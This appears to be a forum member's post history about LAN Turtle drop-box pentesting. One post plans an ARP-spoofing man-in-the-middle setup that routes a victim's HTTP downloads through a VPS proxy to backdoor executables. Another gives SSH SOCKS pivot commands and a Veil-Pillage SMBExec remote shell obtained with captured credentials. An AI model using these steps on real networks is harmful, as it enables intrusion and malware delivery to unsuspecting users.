Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Everything posted by jxg975

  1. Yea, i just wanted to get HTTP data, not HTTPS. But i'll start with that. Thanks!
  2. Hi all! hopefully this hasn't been posted anywhere else... I wanted to see if anyone could help me with an issue. here's the scenario: I have a "victim" box (windows 7) that I want to MITM using arpspoof. From there, the MITM machine (kali) will redirect any incoming HTTP connections on port 80 to another server in the cloud (VPS) which is hosting a transparent proxy to backdoor any exe's that pass through it. The idea is that I have a drop box on a lan, MITM the victim machine. The victim then browses to the web to download putty. during this, the victim is passing all the traffic through my drop box (kali) which is redirecting the victim to the VPS in the cloud, which then re-redirects him to whatever site (in this case, putty). I can't seem to find any good way to force an incoming connection on port 80 to redirect a user to the VPS on another IP and port...I've tried SSH Local port forwarding, Netcat relays, and iptables. I wanted to know if anyone out there has had any success on this... Image! [VICTIM Machine] --> [[MITM machine (kali)]] --> (router) ------------->INTERNET! ------->[VPS....which then forwads to original website] -------> (Putty.com or whatever) Victim browses to putty.com, the MITM machine redirects to my VPS in the cloud, the VPS has PEinjector (great tool, look it up!) which acts as a transparent proxy, which then forwards the connection to putty.com Any thoughts/help/hints/etc will help! Thanks
  3. Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts I used the first line, which was this command: ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222 By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran root@kali#proxychains ./Veil-Pillage Which would take me to dialogue screen, I chose number 25, set my target (which was, a win7 VM) and my creds, and just hit ran! Veil-Pillage: post-explotation framework | [Version]: 1.1.2 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executing module: Smbexec Shell... [*] Type 'exit' to exit the shell Trying protocol 445/SMB... Creating service SystemDiag... |S-chain|-<>-***.***.***.***-<><>-<><>-OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts! TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"
  4. Quick thing: Can anybody walkthrough the settings they have enabled on their OpenVPN access server? I have the "client gateway" box checked, and the correct subnet to route to, but the VPN still won't route to my internal network (when i'm external connected to the access server). Anybody have clear directions on what settings they have enabled on the access server?
  5. Hey Darren, quick question: I wanted to setup my turtle with AutoSSH, but my server's ssh port is not 22 (i changed it to a different port). I was able to create an ssh tunnel using the command line from the turtle, but I can't seem to get it to work from the module itself. I tried to add my port number to the end of the host info (i.e user@serverport -p XXXX), but everytime I try to save it, it drops the port number. Any help? Thanks! -- Jon
  • Create New...